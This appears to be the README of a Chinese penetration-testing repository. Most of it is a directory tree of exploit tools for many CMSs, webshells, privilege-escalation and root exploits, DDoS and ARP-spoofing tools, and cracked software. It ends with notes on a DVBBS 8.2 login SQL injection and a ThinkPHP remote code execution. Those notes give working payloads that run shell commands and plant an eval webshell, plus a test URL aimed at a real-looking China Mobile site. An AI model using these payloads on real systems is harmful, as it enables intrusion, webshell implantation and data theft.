/penetration

渗透 超全面的渗透资料💯 包含:0day,xss,sql注入,提权……

Primary LanguagePython

penetration

收集的渗透资料,现在分享一下

点个小星星呗~

欢迎继续提供相关资料,可以issue或者pull request

收集不易 分享请注明来源~

https://github.com/w1109790800/penetration

欢迎关注我的公众号:

我的小程序:

目录结构

├─0day & exp
│  ├─08CMS
│  ├─AKCMS
│  ├─bbsxp
│  │  ├─BBSxp7.0
│  │  ├─bbsxp综合利用工具
│  │  └─BBSXP论坛漏洞完全注册工具
│  ├─BLUECMS
│  ├─CreateLiveCMS
│  ├─discuz
│  │  ├─discuz
│  │  ├─Discuz!PM短消息漏洞利用工具
│  │  ├─discuz2.5x
│  │  ├─discuz7
│  │  └─dz
│  ├─Diy-Page
│  ├─Drupal
│  ├─DVBBS
│  ├─Ecshop
│  ├─joomla
│  ├─KINGCMS
│  ├─NBArticle
│  ├─Oblog
│  │  ├─CBlog利用工具
│  │  ├─oblog
│  │  │  └─Tool
│  │  ├─Oblog 4.X Exp漏洞利用工具
│  │  ├─Oblog4.6SQL版漏洞利用工具
│  │  └─OblogSql
│  ├─php168
│  │  ├─php168exp
│  │  └─PHP168注入ODAY工具
│  ├─phpbb
│  │  ├─phpBB Extractor Reloaded(PHPBB漏洞利用工具)
│  │  ├─PHPBB2.0.22MOD版利用工具
│  │  ├─phpbblinkblind
│  │  ├─phpbb暴力破解工具
│  │  └─国外的PHPBB2论坛程序攻击工具
│  │      └─国外的PHPBB2论坛程序攻击工具
│  ├─phpcms
│  │  ├─PhpCms V9
│  │  │  └─phpv9任意读取文件
│  │  ├─phpcms0dayEXP_内部增强版
│  │  └─phpcms2007
│  ├─PHPweb
│  │  └─PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码
│  ├─phpwind
│  │  ├─phpwind
│  │  ├─phpwind 5.0.1 Sql注射漏洞利用程序.php
│  │  ├─phpwind1.3.6论坛利用程序
│  │  ├─PhpWind2.0.2 & 3.31CE漏洞
│  │  ├─PHPWind4.3.2漏洞利用
│  │  ├─phpwind5.x passport_client.php UPDATE SQL Injection POC.php
│  │  ├─PHPWindBlog漏洞利用程序
│  │  │  └─phpwindblog
│  │  ├─PhpwindWapExp
│  │  ├─PHPWIND_exp
│  │  └─PHPWIND插件漏洞
│  ├─Shopex
│  ├─UCHOME
│  ├─wordpress
│  ├─Z-BLOG
│  ├─乔客JoekoeCMS
│  ├─别的一些exp
│  │  ├─CBlog利用工具
│  │  ├─EQdkp注入工具
│  │  ├─jsp暴源代码工具
│  │  │  └─jsp暴源代码工具
│  │  │      └─控件包
│  │  ├─L-Blog提权漏洞利用程序
│  │  ├─PJblog V3.0黑客漏洞利用工具
│  │  ├─sablog利用工具
│  │  ├─SuperUpFile1.0
│  │  ├─upfile
│  │  ├─“动感下载 v3.0”Cookie注入漏洞利用工具
│  │  ├─乔客exp
│  │  ├─凸丫丫
│  │  ├─动力文章系统
│  │  ├─记事狗微博3.0注入利用工具
│  │  ├─逍遥网站整站系统后门扫描器 1.0
│  │  ├─零号KingCMS上传利用
│  │  └─风汛暴库器
│  ├─动易cms
│  │  ├─SWInject
│  │  ├─动易2005Access版上传漏洞
│  │  ├─动易Region.asp注入辅助工具
│  │  └─动易漏洞利用工具与动画教程
│  ├─动网bbs
│  │  ├─动网asp版
│  │  │  ├─DVBBS 7.1.0 SP1 Savepost.asp漏洞工具
│  │  │  ├─dvbbs-qx0507
│  │  │  ├─Dvbbs8后台拿webshell的mdb
│  │  │  ├─dvbbsdt.exe
│  │  │  ├─动网7.0 sp2提升前台工具
│  │  │  ├─动网7.0 SP2漏洞利用程序
│  │  │  ├─动网7.0sp2前后台权限提升工具
│  │  │  ├─动网7.1sql
│  │  │  ├─动网7.1SQL版注入漏洞利用工具
│  │  │  ├─动网7在线人数攻击器增强版
│  │  │  ├─动网8.0sql最新漏洞利用工具
│  │  │  │  └─动网8.0sql最新漏洞利用工具
│  │  │  ├─动网8.0sql漏洞利用工具
│  │  │  │  └─dv8sql
│  │  │  ├─动网上传漏洞
│  │  │  ├─动网前台提权+爆后台密码
│  │  │  ├─动网前台提权工具华盟版
│  │  │  ├─动网博客7.1注入漏洞利用工具
│  │  │  ├─动网固顶贴工具
│  │  │  ├─动网帐号提取器
│  │  │  ├─动网日志清除工具
│  │  │  ├─动网空数据库合并成伪ASP木马专用工具
│  │  │  └─动网综合利用工具
│  │  └─动网php版
│  │      └─dvbbs_php2.0_fucker
│  ├─帝国EmpireCMS
│  ├─新云
│  │  └─xinyun
│  ├─科讯KesionCMS
│  ├─逐浪CMS
│  └─风讯foosunCMS
├─ASP 0day
│  ├─ASPCMS
│  ├─DvBBS(动网))
│  ├─foosun(风讯)
│  ├─Joekoe(乔客)
│  ├─kesion(科汛)
│  │  ├─kesioncms6.x-7.06
│  │  └─科讯cms利用
│  ├─KingCMS
│  ├─newasp(新云)
│  ├─[博客] pjblog
│  ├─[博客] Z-Blog
│  ├─动易cms
│  └─老Y文章管理系统
├─PHP 0day
│  ├─DeDeCms(织梦)
│  │  ├─Dede+v5.7+feedback.php-12-10-31
│  │  ├─DedeCms buy_action SQL利用工具
│  │  ├─dedecms2
│  │  │  └─dedecms2
│  │  ├─DeDecms各版本0day
│  │  │  └─DeDecms vx减缩版
│  │  ├─dedeexp
│  │  └─织梦dedecms 5.7上传漏洞代码
│  ├─ECMS(帝国)
│  ├─Joomla!
│  ├─PageAdmin cms
│  ├─PHP168
│  ├─PHPCMS
│  │  ├─phpv9任意读取
│  │  └─phpv9漏洞利用工具[1].rar
│  │      └─phpv9漏洞利用工具
│  ├─PHPweb
│  │  └─PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码
│  ├─ThinkPHP 漏洞
│  ├─Uchome
│  ├─vBulletin 4.X
│  ├─[BBS] Discuz!
│  ├─[BBS] phpWind
│  ├─[博客] wordpress
│  ├─[商城] EcShop
│  │  ├─ecshop漏洞整理
│  │  │  └─ecshop漏洞整理
│  │  │      ├─ec2.6 2.7利用工具
│  │  │      └─ecshop注入exp
│  │  ├─eshop_exp
│  │  ├─Mc Shop网络商城0day利用工具
│  │  ├─Shopex 4.8.5
│  │  └─shopex_EXP及后台拿shell keio20120826整理版
│  └─[商城] ShopEx
│      └─Shopex 注入漏洞 0day (4.8.5)
├─xss 测试
│  └─xss完整版插件keepsenins
│      └─xss完整版插件keepsenins
│          ├─apps
│          │  └─index
│          │      ├─action
│          │      ├─lib
│          │      ├─model
│          │      └─view
│          │          ├─code
│          │          ├─index
│          │          ├─project
│          │          ├─public
│          │          │  ├─js
│          │          │  └─style
│          │          │      └─toolbar
│          │          ├─user
│          │          └─xing
│          ├─bin
│          ├─cache
│          ├─config
│          ├─static
│          │  ├─js
│          │  └─style
│          └─uauc
│              ├─class
│              ├─common
│              └─core
├─入侵资料
│  ├─3889相关
│  ├─Cookie欺骗入侵网站
│  ├─Linux
│  ├─Mssql
│  ├─Mysql
│  ├─php
│  ├─root  sa相关
│  ├─vpn
│  │  ├─cmd下快速开VPN
│  │  │  └─autovpn(非常好的命令行下开vpn工具)
│  │  └─jz-vpn-setup
│  ├─xss
│  │  └─xss完整版插件keepsenins
│  │      └─xss完整版插件keepsenins
│  │          ├─apps
│  │          │  └─index
│  │          │      ├─action
│  │          │      ├─lib
│  │          │      ├─model
│  │          │      └─view
│  │          │          ├─code
│  │          │          ├─index
│  │          │          ├─project
│  │          │          ├─public
│  │          │          │  ├─js
│  │          │          │  └─style
│  │          │          │      └─toolbar
│  │          │          ├─user
│  │          │          └─xing
│  │          ├─bin
│  │          ├─cache
│  │          ├─config
│  │          ├─static
│  │          │  ├─js
│  │          │  └─style
│  │          └─uauc
│  │              ├─class
│  │              ├─common
│  │              └─core
│  ├─上传突破
│  ├─入侵aspx网站
│  ├─入侵技巧
│  ├─入侵文本
│  ├─其他入侵文章
│  │  └─webshell权限让服务器重启
│  ├─其他有用入侵资料
│  │  ├─其他有用入侵资料1
│  │  │  └─ngnix空字节执行漏洞
│  │  └─其他有用入侵资料2
│  ├─其他设备
│  ├─内网渗透相关
│  │  ├─arp
│  │  ├─ipc$入侵
│  │  ├─内网入侵
│  │  │  └─内网渗透资料
│  │  │      ├─rpc入侵
│  │  │      └─内网最常用工具下载及使用方法
│  │  ├─内网渗透经典文集_1
│  │  ├─内网渗透经典文集_2
│  │  ├─内网渗透经典文集_3
│  │  ├─域
│  │  ├─端口入侵
│  │  └─远程溢出
│  ├─反弹相关
│  ├─垃圾资料
│  ├─密码
│  └─手工注入
│      ├─access等其他注入
│      ├─MSSQL注入
│      │  └─SA错误修复
│      ├─MYSQl注入
│      ├─Oracle SQL注射
│      ├─PostgreSQL
│      ├─sqlmap
│      ├─延时注入
│      └─搜型登陆框新注入
├─大小马
│  ├─asp大马
│  ├─asp小马
│  ├─JSP
│  ├─php大马
│  ├─php小马
│  ├─一句话
│  └─菜刀
│      ├─CCC
│      └─Customize
├─技术文章
├─技术资料
├─提权利器
│  ├─32位系统用户账号密码查看器
│  ├─Api添加用户(F4ck Team)
│  ├─linux
│  │  ├─2.2.27
│  │  ├─2.2.x
│  │  ├─2.4 2.6
│  │  ├─2.4.17
│  │  ├─2.4.18
│  │  ├─2.4.19
│  │  ├─2.4.20
│  │  ├─2.4.21
│  │  ├─2.4.22
│  │  ├─2.4.22-10
│  │  ├─2.4.23
│  │  ├─2.4.24
│  │  ├─2.4.25
│  │  ├─2.4.26
│  │  ├─2.4.27
│  │  ├─2.4.29
│  │  ├─2.4.34
│  │  ├─2.4.x
│  │  ├─2.6.10
│  │  ├─2.6.11
│  │  ├─2.6.12
│  │  ├─2.6.13
│  │  ├─2.6.14
│  │  ├─2.6.15
│  │  ├─2.6.16
│  │  ├─2.6.17
│  │  ├─2.6.18
│  │  ├─2.6.2
│  │  ├─2.6.23 - 2.6.24
│  │  ├─2.6.4
│  │  ├─2.6.5
│  │  ├─2.6.7
│  │  ├─2.6.8
│  │  ├─2.6.9
│  │  ├─2.6.9-34
│  │  ├─2.6.x
│  │  ├─CentOS5.5
│  │  ├─FreeBSD 4.4 - 4.6
│  │  ├─FreeBSD 4.8
│  │  ├─FreeBSD 5.3
│  │  ├─icons
│  │  │  └─img
│  │  │      └─mini
│  │  ├─Mac OS X
│  │  ├─netcat
│  │  ├─OpenBSD
│  │  ├─r00t-t00ls
│  │  ├─red-7.3
│  │  ├─red-8.0
│  │  ├─red-hat8.0
│  │  ├─redhat 7.0
│  │  ├─redhat 7.1
│  │  ├─Root exploits
│  │  ├─Spaciel
│  │  ├─SunOS 5.10
│  │  ├─SunOS 5.7
│  │  ├─SunOS 5.8
│  │  └─SunOS 5.9
│  ├─LPK2.0
│  ├─NC反弹CMD
│  ├─PwDump7破解管理hash
│  ├─shell.Users组建vbs提权
│  ├─shift后门
│  ├─T00ls Lpk Sethc v4
│  ├─T00ls_Lpk_Sethc_v3
│  ├─不死帐号
│  ├─免NET提权
│  ├─免参数版pr
│  ├─剑眉大侠提权常用EXP
│  ├─开3389端口(神器)
│  ├─截取3389
│  │  └─dat
│  ├─提权工具
│  ├─无NET时添加用户(大胆)
│  ├─无NET时添加用户(拉登哥哥)
│  ├─星外提权EXP
│  │  ├─ee.exe提权法
│  │  └─vbs读取IIS提权法
│  ├─直接抓取Windows明文
│  └─解除TCPIP筛选小工具
├─注入练习
│  └─sqli-labs-master
│      ├─images
│      ├─index.html_files
│      │  └─icons
│      ├─Less-1
│      ├─Less-10
│      ├─Less-11
│      ├─Less-12
│      ├─Less-13
│      ├─Less-14
│      ├─Less-15
│      ├─Less-16
│      ├─Less-17
│      ├─Less-18
│      ├─Less-19
│      ├─Less-2
│      ├─Less-20
│      ├─Less-21
│      ├─Less-22
│      ├─Less-23
│      ├─Less-24
│      ├─Less-25
│      ├─Less-25a
│      ├─Less-26
│      ├─Less-26a
│      ├─Less-27
│      ├─Less-27a
│      ├─Less-28
│      ├─Less-28a
│      ├─Less-29
│      ├─Less-3
│      ├─Less-30
│      ├─Less-31
│      ├─Less-4
│      ├─Less-5
│      ├─Less-6
│      ├─Less-7
│      ├─Less-8
│      ├─Less-9
│      └─sql-connections
├─渗透工具
│  ├─3款土耳其注入工具
│  │  └─sql programlar
│  │      ├─m4xmysql
│  │      ├─sql dökücü
│  │      └─Sql Poizon v1.1
│  ├─Access 数据库特殊操作器
│  │  └─Access 数据库特殊操作器
│  ├─Domain3.5
│  │  └─Domain3.5
│  │      └─Domain3.5
│  ├─gason-0.9.5
│  ├─havij
│  ├─html 工具
│  ├─hulk
│  ├─LiQiDiS_2.71a33
│  │  └─LiQiDiS_2.71a33
│  │      ├─autoSave
│  │      ├─config
│  │      ├─dict
│  │      ├─help
│  │      │  ├─ConfigSQLServer
│  │      │  │  └─images
│  │      │  ├─如何配置基于我的SQLServer服务器转发
│  │      │  │  └─sqlImages
│  │      │  └─通过路由器上网的用户如何设置服务器转发
│  │      │      └─images
│  │      ├─languages
│  │      ├─md5engines
│  │      │  ├─hashcrack.com(slow)
│  │      │  ├─md5.mmkey.com
│  │      │  ├─md5.rednoize.com(slow)
│  │      │  ├─md5decryption.com
│  │      │  ├─passcracking.com
│  │      │  ├─tools.benramsey.com
│  │      │  ├─www.md5x.com(_uCode)
│  │      │  └─www.xmd5.org
│  │      ├─skinSharpSkins
│  │      ├─SQL
│  │      ├─tools
│  │      │  ├─ChinaChopper
│  │      │  └─lake2eval_client
│  │      │      └─func
│  │      ├─upload
│  │      │  └─webShells
│  │      └─works
│  ├─nikto-2.1.5
│  │  ├─databases
│  │  ├─docs
│  │  ├─plugins
│  │  └─templates
│  ├─oauth2-server-php-master
│  │  ├─src
│  │  │  └─OAuth2
│  │  │      ├─Controller
│  │  │      ├─GrantType
│  │  │      ├─Response
│  │  │      ├─ResponseType
│  │  │      ├─Storage
│  │  │      └─TokenType
│  │  └─test
│  │      ├─config
│  │      ├─lib
│  │      │  └─OAuth2
│  │      │      ├─Request
│  │      │      └─Storage
│  │      └─OAuth2
│  │          ├─GrantType
│  │          ├─Server
│  │          │  ├─Access
│  │          │  ├─Authorize
│  │          │  └─Grant
│  │          └─Storage
│  ├─Openvas中文漏洞扫描器
│  ├─pangoin 3.2.4
│  │  └─pangoin 3.2.4
│  │      └─Pangolin_Professinal_Edition_3[1].2.4.1132_CracKed
│  ├─php脱大容量表的优秀代码 by qiushui[r00ts]
│  ├─poc 401
│  ├─r00ts蘑菇(玩命青年)webshell木马组合套
│  │  └─星外提权aspx大马(去后门版)
│  ├─Slowloris.pl
│  ├─snuck
│  │  └─payloads
│  ├─sqlmap GUI
│  │  ├─cfg_dir
│  │  ├─doc
│  │  ├─extra
│  │  │  ├─beep
│  │  │  ├─cloak
│  │  │  ├─dbgtool
│  │  │  ├─icmpsh
│  │  │  ├─mssqlsig
│  │  │  ├─runcmd
│  │  │  │  └─windows
│  │  │  │      └─runcmd
│  │  │  ├─safe2bin
│  │  │  ├─shellcodeexec
│  │  │  │  └─linux
│  │  │  ├─shutils
│  │  │  └─sqlharvest
│  │  ├─lib
│  │  │  ├─controller
│  │  │  ├─core
│  │  │  ├─parse
│  │  │  ├─request
│  │  │  ├─takeover
│  │  │  ├─techniques
│  │  │  │  ├─blind
│  │  │  │  ├─brute
│  │  │  │  ├─dns
│  │  │  │  ├─error
│  │  │  │  └─union
│  │  │  └─utils
│  │  ├─output
│  │  │  ├─2012.100km.qdn.cn
│  │  │  ├─grawww.nju.edu.cn
│  │  │  ├─liuxue.eastday.com
│  │  │  ├─tw.beanfun.com
│  │  │  ├─www.artc.net.cn
│  │  │  ├─www.bangyuanjiaoyu.com
│  │  │  ├─www.facebook.com
│  │  │  ├─www.hbetsc.org
│  │  │  ├─www.hnslsdxy.com
│  │  │  ├─www.jeleechem.com
│  │  │  ├─www.jyht.hk
│  │  │  ├─www.motocurtain.com
│  │  │  └─www.onetouch.cn
│  │  ├─plugins
│  │  │  ├─dbms
│  │  │  │  ├─access
│  │  │  │  ├─db2
│  │  │  │  ├─firebird
│  │  │  │  ├─maxdb
│  │  │  │  ├─mssqlserver
│  │  │  │  ├─mysql
│  │  │  │  ├─oracle
│  │  │  │  ├─postgresql
│  │  │  │  ├─sqlite
│  │  │  │  └─sybase
│  │  │  └─generic
│  │  ├─procs
│  │  │  ├─mssqlserver
│  │  │  ├─mysql
│  │  │  ├─oracle
│  │  │  └─postgresql
│  │  ├─shell
│  │  ├─tamper
│  │  ├─thirdparty
│  │  │  ├─ansistrm
│  │  │  ├─beautifulsoup
│  │  │  ├─chardet
│  │  │  ├─clientform
│  │  │  ├─colorama
│  │  │  ├─fcrypt
│  │  │  ├─gprof2dot
│  │  │  ├─keepalive
│  │  │  ├─magic
│  │  │  ├─multipart
│  │  │  ├─odict
│  │  │  ├─oset
│  │  │  ├─pagerank
│  │  │  ├─prettyprint
│  │  │  ├─pydes
│  │  │  ├─socks
│  │  │  ├─termcolor
│  │  │  └─xdot
│  │  ├─txt
│  │  ├─udf
│  │  │  ├─mysql
│  │  │  │  ├─linux
│  │  │  │  │  ├─32
│  │  │  │  │  └─64
│  │  │  │  └─windows
│  │  │  │      ├─32
│  │  │  │      └─64
│  │  │  └─postgresql
│  │  │      ├─linux
│  │  │      │  ├─32
│  │  │      │  │  ├─8.2
│  │  │      │  │  ├─8.3
│  │  │      │  │  ├─8.4
│  │  │      │  │  └─9.0
│  │  │      │  └─64
│  │  │      │      ├─8.2
│  │  │      │      ├─8.3
│  │  │      │      ├─8.4
│  │  │      │      └─9.0
│  │  │      └─windows
│  │  │          └─32
│  │  │              ├─8.2
│  │  │              ├─8.3
│  │  │              ├─8.4
│  │  │              └─9.0
│  │  └─xml
│  │      └─banner
│  ├─struts2 漏洞利用工具
│  │  ├─extlib
│  │  ├─lib
│  │  │  ├─img
│  │  │  ├─skin
│  │  │  │  └─button_style_guide
│  │  │  ├─sysconfig
│  │  │  └─use
│  │  ├─plugins
│  │  │  ├─e0LfdE8DMNm09Dbc
│  │  │  ├─m1x7pUSLJT6gBdy8
│  │  │  ├─tmp
│  │  │  │  ├─cajcxyktchvglqgb
│  │  │  │  ├─gyqqzilgggacqyvz
│  │  │  │  ├─ocxdgefpyqfegdgb
│  │  │  │  ├─oquomowzpdsdgqfp
│  │  │  │  ├─oypxqfvdvylttpwf
│  │  │  │  ├─oywojapgdtpzewvv
│  │  │  │  ├─unsxczsdozetwfyv
│  │  │  │  ├─vjqdxsqlefyekjyx
│  │  │  │  ├─vmokdgbjnxmezswo
│  │  │  │  ├─xlsalbluxbqoimeb
│  │  │  │  └─xvyvduvlwcsyerqd
│  │  │  ├─_toolmao_sys_CMD
│  │  │  │  └─skin
│  │  │  │      └─button_style_flex
│  │  │  ├─_toolmao_sys_工具猫
│  │  │  ├─_toolmao_sys_扩展函数库
│  │  │  ├─_toolmao_sys_程序管理器
│  │  │  ├─_toolmao_sys_魔盒设置
│  │  │  │  └─skin
│  │  │  │      └─button_style_flex
│  │  │  └─取色工具
│  │  └─测试
│  ├─Umbrella Project 2012
│  │  └─list
│  ├─WebDDOS
│  ├─WebRobot
│  │  ├─data
│  │  │  ├─dict
│  │  │  │  └─eWebEditor
│  │  │  │      └─SysImage
│  │  │  │          ├─bg
│  │  │  │          ├─emot
│  │  │  │          └─file
│  │  │  ├─keyword
│  │  │  └─tools
│  │  │      ├─lake2eval_client
│  │  │      │  └─func
│  │  │      └─ShellManager
│  │  └─log
│  │      └─config
│  ├─WebSploit Framework V.2.0.3
│  ├─websurgery
│  │  └─WebSurgery_v06
│  ├─WSExplorer
│  ├─Xenotix_XSS_Exploitation_Framework
│  │  └─Xenotix XSS Exploitation Framework
│  │      └─build
│  │          └─Application Files
│  │              └─Xenotix XSS Exploit Framework_1_0_0_110
│  ├─一个扫C段WEB敏感信息的工具
│  │  └─一个扫C段WEB敏感信息的工具
│  │      └─一个扫C段WEB敏感信息的工具
│  │          └─plugins
│  ├─啊D扫目录asp+字典
│  │  └─啊D扫目录asp+字典
│  ├─国外超强注入工具Cfm Private SQL Injection
│  │  └─国外超强综合注入程序Cfm Private SQL Injection Tool
│  │      └─hackcfm_private_src
│  ├─御剑 1.5
│  │  ├─临时处理数据文件夹
│  │  └─配置文件
│  ├─文件合并工具
│  ├─目录字典
│  ├─老兵COOKIES欺骗工具
│  │  └─老兵COOKIES欺骗工具
│  ├─脱裤打包
│  │  ├─aspwebbackup
│  │  └─mssql
│  └─雷池加密解密
│      └─雷池加密解密
├─漏洞汇总
│  ├─BT5 MSF JAVA 0day CVE-2013-0422 Exploit Demo By K8team
│  │  └─BT5 MSF JAVA 0day CVE-2013-0422 Exploit Demo By K8team
│  ├─dede全部exp
│  │  └─Dede+v5.7+feedback.php-12-10-31
│  ├─ecshop
│  ├─ECSHOP全版本注入0DAY
│  ├─fck.py
│  ├─MySQL hash 登陆0day及exp
│  │  └─MySQL hash 登陆0day及exp
│  ├─mysql_win_remote_stuxnet_technique;mysql溢出
│  │  ├─1
│  │  │  └─mysql_scanner
│  │  │      └─mysql_scanner
│  │  └─mysql_win_remote_stuxnet_technique
│  │      └─mysql_scanner
│  │          └─mysql_scanner
│  ├─phpcms
│  │  └─phpv9任意读取
│  ├─PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码
│  ├─Shopex 注入漏洞 0day (4.8.5)
│  ├─struts2 漏洞利用工具
│  │  └─struts2 漏洞利用工具
│  │      ├─extlib
│  │      ├─lib
│  │      │  ├─img
│  │      │  ├─skin
│  │      │  │  └─button_style_guide
│  │      │  ├─sysconfig
│  │      │  └─use
│  │      ├─plugins
│  │      │  ├─e0LfdE8DMNm09Dbc
│  │      │  ├─m1x7pUSLJT6gBdy8
│  │      │  ├─tmp
│  │      │  │  ├─cajcxyktchvglqgb
│  │      │  │  ├─ocxdgefpyqfegdgb
│  │      │  │  ├─oquomowzpdsdgqfp
│  │      │  │  ├─oypxqfvdvylttpwf
│  │      │  │  ├─oywojapgdtpzewvv
│  │      │  │  ├─vjqdxsqlefyekjyx
│  │      │  │  ├─vmokdgbjnxmezswo
│  │      │  │  ├─xlsalbluxbqoimeb
│  │      │  │  └─xvyvduvlwcsyerqd
│  │      │  ├─_toolmao_sys_CMD
│  │      │  │  └─skin
│  │      │  │      └─button_style_flex
│  │      │  ├─_toolmao_sys_工具猫
│  │      │  ├─_toolmao_sys_扩展函数库
│  │      │  ├─_toolmao_sys_程序管理器
│  │      │  ├─_toolmao_sys_魔盒设置
│  │      │  │  └─skin
│  │      │  │      └─button_style_flex
│  │      │  └─取色工具
│  │      └─测试
│  └─记事狗微博3.0注入利用工具
└─终端工具
    ├─APMServ-v5.2.6
    ├─Cain4.9
    │  └─Cain4.9
    │      ├─Winrtgen
    │      └─Wordlists
    ├─FTP架设器
    ├─HFS网络文件服务器2.3
    ├─IIS信息查看软件
    ├─MAC地址修改器
    ├─MAC地址扫描器
    ├─NetFuke (arp欺骗)
    │  ├─dic
    │  ├─dll
    │  ├─inc
    │  ├─log
    │  ├─ocx
    │  └─voice
    ├─SYN数据流量攻击器
    ├─TV远控完美破解版
    ├─一款最牛清理C盘工具
    ├─七行者IP代理验证 V1.3
    ├─大侠专用擦PP工具
    ├─幻境网盾(无视ARP防火墙)
    ├─直接使服务器蓝屏重启的东东
    │  └─MS12-020 PoC[bug修正版 + 数据包nc发送版]
    │      └─数据包nc发送版
    ├─端口转发神器--reDuh
    │  └─reDuhServers
    ├─组策略清除工具1.1
    

下面是几个文件的具体内容:

dvbbs 8.2 SQL注射漏洞分析

[dvbbs 8.2 SQL注射漏洞分析 全文]漏洞公告:http://seclists.org/bugtraq/2008/May/0330.html

利用方式:一个典型的sql注射漏洞,按照公告里说的用

password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&am 

漏洞分析:动网在asp领域也算一个比较元老的程序,这次在8.2新版里有一个低级的错误.漏洞代码在login.asp 118行左右 

...... 

username=trim(Dvbbs.CheckStr(request("username"))) 

If ajaxPro Then username = unescape(username) 

...... 

取得的username是先经过检查然后再unescape解码,导致用urlencode模式就可以饶过任何检查,和php的urldecode导致的注射很类似,譬如用%2527就可以提交’过去了. 

ThinkPHP 漏洞

2.0版本 /ThinkPHP/Lib/Think/Util/Dispatcher.class.php

2.1版本/ThinkPHP/Lib/Core/Dispatcher.class.php

搜索preg_replace 有一段替换使用了/e模式, 而且thinkphp底层没有提供参数的过滤, 这边就直接崩溃了。

测试代码

/index.php/Module/Action/Param/${@phpinfo()}

http://www.js.10086.cn/wxcs/ppo/YC/index.php/Public/MedInsurance/1/%7B$%7Bphpinfo()%7D%7D

/admin//index.php/public/login

去掉login 版本信息出来

最近thinkphp框架爆出了一个任意代码执行漏洞,其威胁程序相当的高,漏洞利用方法如下:

index.php/module/aciton/param1/${@print(THINK_VERSION)}index.php

/module/aciton/param1/${@function_all()}

其中function_all代表任何函数,

比如:index.php/module/aciton/param1/${@phpinfo()}

获取服务器的系统配置信息等。

index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

列出网站文件列表

index.php/module/action/param1/{${eval($_POST[s])}}

直接执行一句话代码,用菜刀直接连接.

一切资源请合理使用